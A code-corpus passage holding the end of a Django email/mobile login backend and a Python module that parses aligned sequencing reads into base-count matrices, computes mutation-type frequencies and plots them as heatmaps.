except User.MultipleObjectsReturned:
user = User.objects.filter(email=username).order_by('id').first()
except User.DoesNotExist:
return None
if getattr(user, 'is_active') and user.check_password(password):
return user
return None
def get_user(self, user_id):
try:
User = get_user_model()
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
class MobileBackend(ModelBackend):
def authenticate(self, username=None, password=None, **kwargs):
try:
User = get_user_model()
user = User.objects.get(contact=username)
except User.MultipleObjectsReturned:
user = User.objects.filter(contact=username).order_by('id').first()
except User.DoesNotExist:
return None
if getattr(user, 'is_active') and user.check_password(password):
return user
return None
def get_user(self, user_id):
try:
User = get_user_model()
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
| [
"kapilarj1997@gmail.com"
] | kapilarj1997@gmail.com |
7dfb68686c9a59b99f7f8d890830641ddf2a6f54 | ab61eb4b5251d46b1fa2d6f0342ac48de9cae851 | /import_analysis.py | 2ad25fd884043a9975d7c0cd87fdd5eaaaa75fca | [] | no_license | aaroncp1an0/TRIDENT | 9eda6dac7025f0faceef1bb7b9fc03aa118862ed | 00188498273db18c51217cad1572e13d2b9be756 | refs/heads/master | 2021-07-03T08:29:35.133652 | 2020-10-26T03:36:52 | 2020-10-26T03:36:52 | 191,283,849 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 41,586 | py | #!/usr/bin/python3
import numpy as np
#import str as str
import sys
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib import colors
np.set_printoptions(suppress=True)
########################################
########################################
#start of module functions
#FUNCTIONS FOR TAKING TWO OVERLAPPING READS AND COMBINING THEIR Q-scores in the region of overlap
#input: FASTQ-bowtie paired reads
#output: SINGLE FASTQ READ in bowtie output format
#Translation table for complementing a DNA sequence (A<->T, C<->G).
intab = b"ATCG"
outtab = b"TAGC"
tabCOMP = bytes.maketrans(intab, outtab) #makes sequence complement
#Translation table mapping base characters to SSM column-index digits:
#'A'->'0', 'T'->'1', 'C'->'2', 'G'->'3', 'N'->'4' (used by updateSSmatrix).
intab = b"ATCGN"
outtab = b"01234"
tabHOT = bytes.maketrans(intab, outtab) #translate a sequence to column-index digits
#FUNCTION FOR COMPUTING SEQUENCE/Q SCORE MATRIX for two FASTQ files
def SeqScoreMAKER(filename1, filename2, filename3, qscoremesh=[20,25,30,33,35,37,40], cutoff=5, seqlength=2300, verbose=False):
    """Build a per-position base-count matrix (SSM) from two bowtie alignment files.

    Parameters
    ----------
    filename1, filename2 : str
        Bowtie-aligned output files for read 1 / read 2 of the paired-end run.
    filename3 : str
        The original (non-aligned) fq1 file; only read by the unreachable
        "general processor" branch at the bottom of this function.
    qscoremesh : list
        NOTE(review): accepted but never used -- the quality binning is the
        hard-coded Qtab table below; confirm whether it should drive Qtab.
    cutoff : int
        Binned quality value (0-9 after Qtab translation) a base must
        exceed to be counted into the matrix.
    seqlength : int
        Number of reference positions (rows) in the returned matrix.
    verbose : bool
        NOTE(review): only used by the unreachable branch below.

    Returns
    -------
    numpy.ndarray, shape (seqlength, 5)
        Counts per reference position; columns are A, T, C, G, N.
    """
    print("warning: remember to edit code if there is substantial paired-end overlap. like for a 300x300 library!")
    ##################################
    #INITIATE VARIABLES
    #Qtab bins the ASCII (Phred+33) quality alphabet into single digit characters.
    #Qmap: 0-20 -> 0; 20:25(1) 27-40(2) 31-40(3) 33-40(4) 35-40(5) 37-40(6) 39,40(7)
    #Qscoremesh should be entered into here
    Qtab=bytes.maketrans(b"!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJ", b"000000000000000000001111122222334456788999")
    # 0 0000000000000000000111112222233445678899
    #SSM[p] holds counts for reference position p, columns [A, T, C, G, N]
    SSM=np.zeros((seqlength,5))
    #files are new!
    endfile1, endfile2 = False, False
    count=0
    ##################################
    #BEGIN MAIN FUNCTION EXECUTION
    #open filehooks
    f1, f2, f3 = readout(filename1, filename2, filename3)
    #print(f1, f2)
    #NOTE(review): this unguarded read consumes (and discards) the first
    #alignment line of f1 before the guarded reads below -- confirm intended.
    FQstring1 = returnparsed(f1.readline(), Qtab)
    #read first line of each FASTQ bowtie paired file
    try: FQstring1 = returnparsed(f1.readline(), Qtab)
    except: print('empty files')
    try: FQstring2 = returnparsed(f2.readline(), Qtab)
    except: print('empty files')
    ###########################ALTERANTIVE FUNCTION (NON DUAL USAGE, NON OVERLAPPING)
    #this will only enter strings which are overlapping
    #This branch always runs: every read from f1 and then from f2 is added to
    #the SSM independently (no pairing). Everything after its final return,
    #i.e. the "general processor", is unreachable and kept for reference.
    if True:
        print('USING NON-OVERLAP PROCESSING, largest possible dataset post-processing')
        Nover, Nexcept = 0, 0
        #
        #initialize a counter for making a histogram of how many mutations there are per string
        mutHIST=np.zeros(40)
        #
        for line in f1:
            ###updating SSM
            #print(FQstring1)
            #FQstring1[1] is [alignment position, sequence, binned quality string]
            try: SSM = updateSSmatrix(FQstring1[1][1],FQstring1[1][2],SSM,FQstring1[1][0],cutoff=cutoff)
            except: print('!! 1 instance of SSM update fail exception !!')
            #increment f1 to the next line in the file
            try: FQstring1 = returnparsed(f1.readline(), Qtab)
            except: endfile1=True
        for line in f2:
            ###updating SSM
            try: SSM = updateSSmatrix(FQstring2[1][1],FQstring2[1][2],SSM,FQstring2[1][0],cutoff=cutoff)
            except: print('!! 1 instance of SSM update fail exception !!')
            #increment f1 to the next line in the file
            try: FQstring2 = returnparsed(f2.readline(), Qtab)
            except: endfile2=True
        if endfile1 and endfile2:
            print('exiting')
            f1.close()
            f2.close()
            f3.close()
            return SSM
        #
        #in case we might want to record # mutations per read....
        #print( np.round( 100*mutHIST[:7]/np.sum(mutHIST), 2 ) )
        #print("{0:.3f}".format( np.round( 100*mutHIST[:7]/np.sum(mutHIST), 2 ) ) )
        return SSM
    #GENERAL PROCESSOR - CAN BE PAIRED ENDS OR NOT
    ######################3
    #NOTE(review): unreachable from here down (the `if True:` branch above
    #always returns); preserved as-is.
    for line in f3: #read a single line from f3, will compare f1 and f2 indexe to see if they match?
        #this function will now search for paired reads, or act on unpaired reads which lack quality pairingix
        #print('using NON-DualStrict processing')
        #process out the read number information using split
        FQstring3 = line.split()[0].split(':')[5:]
        #IF READ INDEX MATCHES MAIN FILE (F3) in either f1:reference or f2:reference, proceed to computations
        if FQstring1[0] == FQstring3 or FQstring2[0] == FQstring3:
            if verbose: print('updating')
            if verbose: print(FQstring1)
            #does f1=f2?
            #yes? - execute overlap function and pairing and read next lines of f1,2,3
            if True:
                #execute single function, and update f1
                ###UPDATE COUNTER HERE
                try: SSM = updateSSmatrix(FQstring1[1][1],FQstring1[1][2],SSM,FQstring1[1][0],cutoff=cutoff)
                except: print('!! 1 instance of SSM update fail exception !!')
                #increment f1 to the next line in the file
                try: FQstring1 = returnparsed(f1.readline(), Qtab)
                except: endfile1=True
                ###execute single function, and update f2 and UPDATE COUNTER HERE
                try: SSM = updateSSmatrix(FQstring2[1][1],FQstring2[1][2],SSM,FQstring2[1][0],cutoff=cutoff)
                except: print('!! 1 instance of SSM update fail exception !!')
                #increment f2 to the next line in the file
                try: FQstring2 = returnparsed(f2.readline(), Qtab)
                except: endfile2=True
            elif FQstring1[0] == FQstring3:
                #execute single function, and update f1
                ###UPDATE COUNTER HERE
                try: SSM = updateSSmatrix(FQstring1[1][1],FQstring1[1][2],SSM,FQstring1[1][0],cutoff=cutoff)
                except: print('!! 1 instance of SSM update fail exception !!')
                #increment f1 to the next line in the file
                try: FQstring1 = returnparsed(f1.readline(), Qtab)
                except: endfile1=True
            elif FQstring2[0] == FQstring3:
                #execute single function, and update f2
                ###UPDATE COUNTER HERE
                try: SSM = updateSSmatrix(FQstring2[1][1],FQstring2[1][2],SSM,FQstring2[1][0],cutoff=cutoff)
                except: print('!! 1 instance of SSM update fail exception !!')
                #increment f2 to the next line in the file
                try: FQstring2 = returnparsed(f2.readline(), Qtab)
                except: endfile2=True
            #just increment f3 at the begining of the next for loop
            else: pass
        #just increment f3 at the beginning of the next for loop
        else: pass
        if endfile1 and endfile2:
            print('exiting')
            f1.close()
            f2.close()
            f3.close()
            return SSM
    return SSM
def SeqLength(filename1, filename2, filename3, qscoremesh=[20,25,30,33,35,37,40], cutoff=5, seqlength=2300, verbose=False):
    """Histogram the offset distances |pos1 - pos2| of properly paired reads.

    Walks f3 (the original fq1 file) and, whenever a read ID appears in both
    bowtie-aligned files (f1 and f2), records the absolute difference of the
    two mates' alignment offsets in a length-5000 count vector.

    Parameters mirror SeqScoreMAKER; qscoremesh, cutoff, and seqlength are
    accepted for interface parity but do not affect the returned histogram.

    Returns
    -------
    numpy.ndarray, shape (5000,)
        Lrecord[d] = number of read pairs whose alignment offsets differ by d.
    """
    print("warning: remember to edit code if there is substantial paired-end overlap. like for a 300x300 library!")
    ##################################
    #INITIATE VARIABLES
    #Qmap: 0-20 -> 0; 20:25(1) 27-40(2) 31-40(3) 33-40(4) 35-40(5) 37-40(6) 39,40(7)
    #Qscoremesh should be entered into here
    Qtab=bytes.maketrans(b"!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHI", b"00000000000000000000111112222334455667788")
    #initializes 2300x4 matrix, where SSM[0] references position 1, with [A,T,C,G] indexes
    #NOTE(review): SSM is allocated here but never updated or returned by this function.
    SSM=np.zeros((seqlength,5))
    Lrecord=np.zeros(5000)
    #files are new!
    endfile1, endfile2 = False, False
    count=0
    ##################################
    #BEGIN MAIN FUNCTION EXECUTION
    #open filehooks
    f1, f2, f3 = readout(filename1, filename2, filename3)
    #read first line of each FASTQ bowtie paired file
    try: FQstring1 = returnparsed(f1.readline(), Qtab)
    except: print('empty files')
    try: FQstring2 = returnparsed(f2.readline(), Qtab)
    except: print('empty files')
    for line in f3: #read a single line from f3, will compare f1 and f2 indexe to see if they match?
        #this function will now search for paired reads, or act on unpaired reads which lack quality pairingix
        #process out the read number information using split
        FQstring3 = line.split()[0].split(':')[5:]
        #IF READ INDEX MATCHES MAIN FILE (F3) in either f1:reference or f2:reference, proceed to computations
        if FQstring1[0] == FQstring3 or FQstring2[0] == FQstring3:
            if verbose: print('updating')
            if verbose: print(FQstring1)
            if FQstring1[0] == FQstring2[0]:
                #execute overlap function and pairing
                #update read f1 and f2 (f3 is taken care of by the main counter)
                #####NEED TO RETURN foverlap, in the same format as FQstring!
                ###UPDATE COUNTER HERE
                #SSM = updateSSmatrix(foverlap[1,1],foverlap[1,2],SSM,foverlap[1,0],cutoff)
                #all fixed
                #x = distance between the two mates' alignment offsets (FQstringN[1][0])
                x=int(np.abs(int(FQstring1[1][0])-int(FQstring2[1][0])))
                try: Lrecord[x]+=1
                except: print('!! 1 instance of SSM dual update fail exception !!')
                #lenthrec[]+=1
                #increment f1 and f2 to the next line in the file
                #exception method for boolean testing of file end
                try: FQstring1 = returnparsed(f1.readline(), Qtab)
                except: endfile1=True
                try: FQstring2 = returnparsed(f2.readline(), Qtab)
                except: endfile2=True
            #does f1=f2?
            #yes? - execute overlap function and pairing and read next lines of f1,2,3
            elif FQstring1[0] == FQstring3:
                #execute single function, and update f1
                ###UPDATE COUNTER HERE
                #increment f1 to the next line in the file
                try: FQstring1 = returnparsed(f1.readline(), Qtab)
                except: endfile1=True
            elif FQstring2[0] == FQstring3:
                #execute single function, and update f2
                ###UPDATE COUNTER HERE
                #increment f2 to the next line in the file
                try: FQstring2 = returnparsed(f2.readline(), Qtab)
                except: endfile2=True
            #just increment f3 at the begining of the next for loop
            else: pass
        #just increment f3 at the beginning of the next for loop
        else: pass
        if endfile1 and endfile2:
            print('exiting')
            f1.close()
            f2.close()
            f3.close()
            return Lrecord
    return Lrecord
#plan out end-logic and exception states
#PART OF THE PARSING FUNCTION
def returnparsed(fastq, Qtab):
    """Parse one bowtie alignment line into [read coordinates, [pos, seq, qual]].

    The read identifier (field 0) is reduced to its last two colon-separated
    components; the quality string (field 6) is remapped through the
    translation table ``Qtab`` into the binned single-digit alphabet.
    Bowtie already reports reads in forward orientation, so no
    reverse-complementing is needed here.
    """
    fields = fastq.split()
    # Remap raw ASCII qualities to the binned score digits.
    fields[6] = fields[6].translate(Qtab)
    read_coords = fields[0].split(':')[-2:]
    # fields[4:7] -> [alignment offset, sequence, translated qualities]
    return [read_coords, fields[4:7]]
#PART OF THE PARSING FUNCTION
#FUNCTION FOR OUTPUTING LINES FROM TWO FILES:
def readout(filename1, filename2, filename3):
    """Open three input files for reading and return their file handles.

    If any file fails to open, a message is printed; the subsequent return
    will then raise NameError because that handle was never bound
    (original behavior, preserved deliberately).
    """
    try:
        handle1 = open(filename1, 'r')
    except:
        print(filename1 + str(' failed to open'))
    try:
        handle2 = open(filename2, 'r')
    except:
        print(filename2 + str(' failed to open'))
    try:
        handle3 = open(filename3, 'r')
    except:
        print(filename3 + str(' failed to open'))
    return handle1, handle2, handle3
#PART OF THE PARSING FUNCTION
def updateSSmatrix(read, scores, SSM, pos=0, cutoff=3, tabhot=None, verbose=False):
    """Increment the sequence/score matrix for one aligned read, in place.

    Parameters
    ----------
    read : str
        Aligned read sequence (characters A/T/C/G/N).
    scores : str
        Per-base binned quality string, one digit character per base
        (already remapped, e.g. by returnparsed's Qtab table).
    SSM : numpy.ndarray, shape (seqlength, 5)
        Count matrix; columns are A, T, C, G, N. Modified in place.
    pos : int or str
        Alignment offset of the read within the reference (coerced to int).
    cutoff : int
        Only bases whose binned score is strictly greater than this value
        are counted.
    tabhot : bytes, optional
        Translation table mapping base characters to column-index digits.
        Fix: this parameter was previously accepted but ignored (the module
        global was always used). It is now honored when given; the default
        (None) builds the same ATCGN -> 01234 table, so existing callers
        see identical behavior.
    verbose : bool
        Print the read and score strings for debugging.

    Returns
    -------
    numpy.ndarray
        The same SSM array, incremented in place.
    """
    if verbose: print(read)
    if verbose: print(scores)
    if tabhot is None:
        # Same mapping as the module-level tabHOT table.
        tabhot = bytes.maketrans(b"ATCGN", b"01234")
    # Column index (0-4) for every base in the read.
    readHOT = np.array(list(read.translate(tabhot)), dtype=int)
    scoresH = np.array(list(scores), dtype=int)
    # 0/1 mask: count only bases whose binned quality passes the cutoff.
    # (A dead "strict neighboring scores" variant was removed here; it was
    # guarded by `if False` and never executed.)
    scoresM = np.zeros(len(scoresH))
    scoresM[scoresH > cutoff] = 1
    # Add one count at (reference position, base column) for each passing base.
    SSM[np.arange(int(pos), int(pos) + len(read), 1), readHOT] += scoresM
    return SSM
#PART OF THE PARSING FUNCTION
def updateSSmatrixDUAL(read1,read2,scores1,scores2,SSM,pos1=0,pos2=0,cutoff=3, tabhot=None, verbose=False): #FUNCTION takes read/scores and increments SSM-matrix at bases which meet the cutoff criteria
    """Increment the SSM from a mate pair, merging qualities where they overlap.

    Three cases:
    * No overlap (|pos1-pos2| >= longer read): each read is added
      independently via updateSSmatrix.
    * read1 starts first and overlaps read2: a merged read spanning both is
      built; in the overlap, disagreeing bases get score 0 (discarded) while
      agreeing bases keep read2's score added on top of read1's.
    * read2 starts first: recurse with the arguments swapped.

    NOTE(review): if pos1 == pos2 (overlapping but equal offsets) no branch
    fires and SSM is returned unchanged -- confirm this is intended.
    NOTE(review): `print(scores)` below raises NameError when verbose=True
    (no variable named `scores` exists in this signature).
    Returns the same SSM array, updated in place.
    """
    #output, returns SSM matrix
    #print('in SSDUAL update')
    if verbose: print(read1)
    if verbose: print(scores)
    pos1, pos2 = int(pos1), int(pos2)
    if abs(pos1-pos2)>=max(len(read1), len(read2)):
        #no overlap: treat the two mates as independent single reads
        SSM = updateSSmatrix(read1,scores1,SSM,pos1,cutoff,tabhot,verbose)
        SSM = updateSSmatrix(read2,scores2,SSM,pos2,cutoff,tabhot,verbose)
        return SSM
    #print(readHOT1, readHOT2)
    #print(scoresH1, scoresH2)
    elif pos1 < pos2 and abs(pos1-pos2)<len(read1):
        #read1 leads and its tail overlaps read2: build one merged read
        readHOT1 = np.array(list(read1.translate(tabHOT)), dtype=int)
        readHOT2 = np.array(list(read2.translate(tabHOT)), dtype=int)
        scoresH1 = np.array(list(scores1), dtype=int)
        scoresH2 = np.array(list(scores2), dtype=int)
        readNEW = np.zeros(len(read2)+pos2-pos1, dtype=int) #new read with terminal at pos1 going out to pos2+read2 length
        scoresN = np.zeros(len(read2)+pos2-pos1, dtype=int)
        #assign 1) read1 to the NEW sequences
        #assign 2) read2 to the NEW sequences: not the overlap region will have 2x the value as it normally should
        readNEW[:len(readHOT1)], scoresN[:len(readHOT1)] = readHOT1, scoresH1
        #print(readNEW)
        if verbose: print(readNEW, readHOT2, pos2, pos1, len(readHOT1), len(readNEW), len(readHOT2))
        readNEW[len(readHOT1):] += readHOT2[len(readHOT1)-pos2+pos1:]
        #print(readNEW)
        scoresN[pos2-pos1:] += scoresH2
        #if there is NOT agreement in the overlap between read1 and read2, set score to 0
        #print(len(scoresN[pos2:]))
        #print(readNEW)
        #print(scoresN)
        scoresN[pos2-pos1:][readNEW[pos2-pos1:]!=readHOT2] = 0
        #for the regions where there are agreement, set the score to 60 - we basically know this is the base
        #formally, we could add the two scores to get the actual number
        #scoresN[pos2-pos1:][readNEW[pos2-pos1:]==readHOT2] = 60
        #print(scoresN, readNEW)
        #0,1 multiplier scoresM; assign 1 depending on cutoff, pull out and add one to all proper positions
        scoresM = np.zeros(len(scoresN), dtype=int)
        scoresM[scoresN>cutoff]=1
        SSM[np.arange(int(pos1),int(pos1)+len(readNEW),1),readNEW]+=scoresM
    elif pos1 > pos2 and abs(pos1-pos2)<len(read2):
        #read2 leads: swap the mates and recurse into the branch above
        SSM = updateSSmatrixDUAL(read2,read1,scores2,scores1,SSM,pos2,pos1,cutoff, tabhot=None, verbose=False)
    return SSM
############
############FILE HANDLING TOOLS
def load_files(filelist, pathA='./ip_M', pathB='', only4=True):
    """Load and return the numpy arrays stored at pathA + name + pathB.

    One array is loaded per entry of ``filelist`` (e.g. pathA='./ip_M',
    name='s4_S1'). ``only4`` is accepted for interface compatibility but
    is not used.
    """
    return [np.load(pathA + name + pathB) for name in filelist]
def moving_average(a, n=3):
    """Return the window-``n`` moving average of ``a`` (length len(a)-n+1)."""
    csum = np.cumsum(a, dtype=float)
    # Subtracting the cumsum shifted by n leaves each window's sum at csum[n-1:].
    csum[n:] = csum[n:] - csum[:-n]
    return csum[n - 1:] / n
def M_norm(M):
    """Normalize a count matrix or vector to frequencies.

    2-D input: every row is divided by its row sum (rows summing to zero
    are left as zeros) and the result is returned TRANSPOSED, i.e. shape
    (cols, rows). 1-D input: divided by its total sum (no zero guard).
    """
    if np.ndim(M) > 1:
        row_totals = np.sum(M, axis=1, dtype=float)
        # Avoid division by zero; zero rows stay all-zero.
        row_totals[row_totals == 0] = 1.0
        return (1.0 / row_totals) * M.T
    total = np.sum(M)
    return (1.0 / total) * M
def plot_i_average(Mnormarray, i=0, N=5, log=True, limitsy=[.000001,.01], limitsx=[750,1150], cutoff=.3):
    """Plot the window-N moving average of row ``i`` of each matrix.

    Entries of row i at or above ``cutoff`` are discarded before smoothing
    (these are identity-base positions, not mutations). Axis limits are
    applied and the y axis is optionally log-scaled.
    """
    for mat in Mnormarray:
        row = mat[i, mat[i, :] < cutoff]
        smoothed = moving_average(row, n=N)
        plt.plot(range(len(smoothed)), smoothed.T)
    plt.ylim(limitsy)
    plt.xlim(limitsx)
    if log:
        plt.yscale('log')
def plot_counts(Marray):
    """Sanity-check plot of total read counts per reference position.

    Accepts either a list of count matrices or a single matrix: if plotting
    the list form fails, Marray is treated as one matrix instead.
    """
    try:
        for counts in Marray:
            plt.plot(range(len(counts)), np.sum(counts, axis=1))
    except:
        plt.plot(range(len(Marray)), np.sum(Marray, axis=1))
def plot_NtoN(Mnormarray,baseStart='A',baseEnd='T',N=20,log=True,limitsy=[.000001,.01],limitsx=[750,1150],cutoff=.3, lims=True, ASScolor=True, colors=['gold'], linewidth=1, remove_out=True):
    """Plot the smoothed baseStart->baseEnd substitution frequency vs position.

    For each matrix in Mnormarray: positions whose baseStart fraction
    exceeds 0.8 are selected, the baseEnd fraction at those positions is
    (optionally) cleansed of extreme outliers in place, smoothed with a
    window-N moving average, and plotted against reference position.
    Returns the plt module for further decoration.

    NOTE(review): with ASScolor=True, ``colors`` must contain at least one
    entry per matrix in Mnormarray or colors[i] raises IndexError (the
    default supplies only 'gold').
    """
    lookup={'A':0,'T':1,'C':2,'G':3}
    start=lookup[baseStart]
    end=lookup[baseEnd]
    i=0
    for array in Mnormarray:
        #print(Mnormarray)
        #positions where baseStart is the identity base
        xA = array[start,:]>.8
        x, y = np.arange(0,len(xA))[xA], array[end,xA]
        #print(len(m.T))
        ###OPTIONAL ANALYSIS FOR OUTLIER REMOVAL
        ###calculating mean and stddev, use these to remove points > 3stddev from mean (calculated w/o zero points)
        ###we then repeat this processing on the new data points in order to correct for re-calculation of the mean/stddev
        ###this processes only changes the moving average curve by removing extreme outliers; mostly correcting at the T-rich promoter
        if remove_out: #remove_outl
            ##PARAMETERS of
            #number of standard deviations*N + mean to allow outliers in
            #reAveraging substitution window (what value to swap with)
            NUMstd, AVE = 3, 30
            #FIRST PASS OF REPLACEMENTS
            #calculate outlier index positions, outLys1
            mean = np.average(y[20:-20])
            stdD = np.std(y[y!=0][20:-20])
            outLys1 = y>NUMstd*stdD+mean
            #replace outLys1 (outliers are swapped for the local window-AVE average)
            y[0:1-AVE][outLys1[0:1-AVE]]=moving_average(y, n=AVE)[outLys1[0:1-AVE]]
            #SECOND PASS OF REPLACEMENTS, accounting for new mean; stdDev
            #calculate outlier index positions, outLys2
            mean = np.average(y[20:-20])
            stdD = np.std(y[y!=0][20:-20])
            outLys2 = y>NUMstd*stdD+mean
            #replace outLys2
            y[0:1-AVE][outLys2[0:1-AVE]]=moving_average(y, n=AVE)[outLys2[0:1-AVE]]
            #re-replace outLys1, accounting for new averaging values
            y[0:1-AVE][outLys1[0:1-AVE]]=moving_average(y, n=AVE)[outLys1[0:1-AVE]]
            #re-replace outLys2, accounting for new averaging values
            y[0:1-AVE][outLys2[0:1-AVE]]=moving_average(y, n=AVE)[outLys2[0:1-AVE]]
        m = moving_average(y, n=N)
        #m = RunningMedian(y, M=N)
        #print(np.shape(x))
        if ASScolor: plt.plot(x[:len(m)],m, color=colors[i], linewidth=linewidth)
        else: plt.plot(x[:len(m)],m, linewidth=linewidth)
        #update color index
        i+=1
    if lims:
        plt.ylim(limitsy)
        plt.xlim(limitsx)
    if log: plt.yscale('log')
    else: pass
    return plt
def plot_ATCG_freq(Mnorm_single, base='A', log=True, area=.3, limitsy=[.0000001,.1], limitsx=[750,1150]):
    """Scatter-plot per-position A/T/C/G fractions at identity-``base`` sites.

    Positions whose fraction of ``base`` exceeds 0.93 are kept (mask);
    the four base fractions are drawn in red/green/blue/purple respectively.
    """
    base_index = {'A': 0, 'T': 1, 'C': 2, 'G': 3}[base]
    # Mask selecting positions where the chosen base is the identity base.
    identity_mask = Mnorm_single[base_index, :] > .93
    positions = range(len(Mnorm_single.T))
    for column, hue in enumerate(('red', 'green', 'blue', 'purple')):
        plt.scatter(positions, Mnorm_single.T[:, column] * identity_mask, s=area, color=hue)
    plt.ylim(limitsy)
    plt.xlim(limitsx)
    if log:
        plt.yscale('log')
def runA_heatmap(Mctrlnorm, Msamplenorm, maskCT=False, maskTC=False,
                 samplename='temp', filename='temp', sumX1X2=[900,1100], nozeros=True,
                 SAVEFIG=False, normalize=True, directory='2017_analysis/'):
    """Compute a control-subtracted 16-entry mutation footprint and plot it.

    Steps: mutation_types() over the window sumX1X2 for control and sample;
    optionally subtract the control (normalize=True); clamp negatives to 0;
    optionally zero entry 9 (C->T) via maskCT and entry 12 via maskTC
    (NOTE(review): entry 12 is the G->A slot in the A/T/C/G x4 layout,
    although the parameter name suggests T->C, which would be entry 6 --
    confirm intended); compute the composition-weighted total rate; then
    normalize the footprint and hand it to plot_heatmap. Optionally saves
    an SVG under ``directory``.
    """
    #EXAMPLE RUN:
    #runA_heatmap(M1norm, M3norm, maskCT=False, maskTC=False,
    #        samplename='EXO1', filename='EXO1minusM2', sumX1X2=[900,1100], nozeros=True,
    #        SAVEFIG=True, directory='20170703_s4s10_analysis/')
    ##############################
    #calculate mutation counts
    try: freq_ctrl = mutation_types(Mctrlnorm,x1=sumX1X2[0],x2=sumX1X2[1])
    except: print('fail ctrl mutation types')
    try: freq_sample = mutation_types(Msamplenorm,x1=sumX1X2[0],x2=sumX1X2[1])
    except: print('fail ctrl mtuation types')
    #print(freq_sample)
    if normalize: freq_difference = freq_sample - freq_ctrl
    else: freq_difference = freq_sample
    ##############################
    #zero out any negative values; these are not logical values to be realized bc/ of the noise threshold
    if nozeros: freq_difference[freq_difference<0] = 0.0
    if maskCT: freq_difference[9] =0
    if maskTC: freq_difference[12]=0
    ##############################
    #calculate total mutation rate
    #METHOD WHICH IGNORES BASE COMPOSITION OF SEQuENCE (each gets 1/4 of representation)
    #####METHOD WHICH REFLECTS BASE COMPOSITION OF SEQUENCE... not as general
    #xN1, xN2 = Mctrlnorm>.50, Msamplenorm>.50
    #totalR1 = np.max(Mctrlnorm.T,axis=1)[sumX1X2[0]:sumX1X2[1]]
    #totalR2 = np.max(Msamplenorm.T,axis=1)[sumX1X2[0]:sumX1X2[1]]
    #if maskCT:
    #    totalR1 = np.max(Mctrlnorm.T,axis=1)[sumX1X2[0]:sumX1X2[1]]
    #if maskTC:
    #
    #totalR1, totalR2 = 1-np.average(totalR1), 1-np.average(totalR2)
    #
    #if normalize: totalrate = totalR2 - totalR1
    #else: totalrate = totalR2
    totalrate = calculate_rate(freq_difference, Msamplenorm, x1=sumX1X2[0], x2=sumX1X2[1], maskCT=maskCT, maskTC=maskTC)
    ##############################
    #Print title rate/file: title carries the log10 of the total rate
    name = samplename + ' | LOG rate@ ' + str('{0:.2}'.format(np.log(totalrate)/np.log(10)))
    #name = samplename+' \ '+PrintRate
    ##############################
    #Normalize the frequencies to fractions of the total footprint
    freq_difference = M_norm(freq_difference)
    #print(freq_difference)
    try: plot_heatmap(mutation_values=freq_difference, circle=True, showtxt=True, title=name)
    except: print('missed')
    if SAVEFIG:
        #prefix the output filename with the active masks
        if maskCT: filename='noCT_'+filename
        if maskTC: filename='noTC_'+filename
        try: plt.savefig(str(directory + filename + '_' + str(sumX1X2[0]) + '_'
                + str(sumX1X2[1]) + '.svg'), transparent=True)
        except: pass
    #plt.savefig()
    plt.show()
def calculate_rate(freq_difference, Mnorm, x1=750, x2=1150, maskCT=False, maskTC=False):
    """Composition-weighted total mutation rate over the window [x1, x2).

    Each of the 16 N->M frequencies in ``freq_difference`` is weighted by
    the fraction of window positions whose identity base is N, so the
    sequence's base composition is reflected. maskCT zeros weight index 9
    (the C->T slot); maskTC zeros weight index 12. Returns the dot product.
    """
    window = Mnorm[:, x1:x2]
    # Fraction of window positions identified as A, T, C, G (identity > 0.5).
    base_fractions = M_norm(np.sum(window[[0, 1, 2, 3], :] > .5, axis=1))
    # Expand to 16 weights: one per N->A/T/C/G entry of freq_difference.
    weights = np.repeat(base_fractions, 4)
    if maskCT:
        weights[9] = 0
    if maskTC:
        weights[12] = 0
    return weights.dot(freq_difference)
#this is sample code for running a single sample to obtain a mutation footprint
# NOTE: deliberately disabled (`if False`) — and even if enabled it would only
# print the snippet text, never execute it; kept as a copy/paste recipe.
if False: print("""
y=mutation_types(M1norm,x1=900,x2=1100)
y[9]=0
z = M_norm(y)
z[9]=0
print('{0:.2}'.format(np.log(sum(y))/np.log(10)))
plot_heatmap(mutation_values=z,circle=True,showtxt=True, title='ctrl')
""")
def mutation_types(Mnorm, x1=750, x2=1150, STDEV=False):
    """Per-base substitution profile over columns [x1:x2).

    Returns a 16-element array laid out as
    A->[A,T,C,G], T->[A,T,C,G], C->[A,T,C,G], G->[A,T,C,G],
    with identity entries (N->N) zeroed.  With STDEV=True, also returns
    the matching 16-element array of standard deviations.
    """
    base_index = {'A': 0, 'T': 1, 'C': 2, 'G': 3}
    profile = np.zeros(16)
    spread = np.zeros(16)
    window = Mnorm[:4, x1:x2]
    for base, row in base_index.items():
        # columns where this base is the dominant (identity) call
        dominant = window[row, :] > .51
        # cross-wise mean/std of N->A, N->T, N->C, N->G at those columns
        col_mean = np.average(window[:, dominant], axis=1)
        col_std = np.std(window[:, dominant], axis=1)
        # zero the identity channel so only substitutions remain
        col_mean[col_mean > .51] = 0
        profile[row * 4:row * 4 + 4] = col_mean
        spread[row * 4:row * 4 + 4] = col_std
    if STDEV:
        return profile, spread
    return profile  # 16x1 array
def plot_heatmap(mutation_values=np.zeros([100,5]),circle=False, showtxt=False, title=''):
    # Draw the 4x4 substitution-type grid: one cell per N->X channel, colored
    # (and, with circle=True, sized) by the normalized mutation value.
    # NOTE(review): default mutation_values is (100,5) but only the first 16
    # entries are ever indexed — presumably a stale default; confirm callers.
    #input format:
    """
    0 A->A
    1 A->T
    2 A->C
    3 A->G
    4 T -A
    5   -T
    6   -C
    7   -G
    8 C..
    9
    10
    11
    12
    13
    14...
    A->:A, T, C, G, T->:A, T, C, G, C->:A, T, C, G, G->:A, T, C, G
    """
    #initial values
    # 16 cell origins on a 4x4 grid, scaled to a 0.8x0.8 drawing area
    xy_values=np.array([[0, 0], [0, 1], [0, 2], [0, 3], [1, 0], [1, 1], [1, 2], [1, 3], [2, 0], [2, 1],
                        [2, 2], [2, 3], [3, 0], [3, 1], [3, 2], [3, 3]])*.2
    size_rect=.2
    size_radius=.098
    fig = plt.figure()
    ax = fig.add_subplot(111, aspect='equal')
    plt.axis('off')
    ax.text(.4, .9, title, verticalalignment='center', horizontalalignment='center')
    #coloring
    #norm=np.sum(mutation_values)
    #mutation_values/=(norm+01.00)
    #print(mutation_values)
    #mutation values
    # linear color normalization over the observed value range
    norm = colors.Normalize(vmin=np.min(mutation_values), vmax=np.max(mutation_values))
    max_mv=np.max(mutation_values)
    for i, xy in enumerate(xy_values):
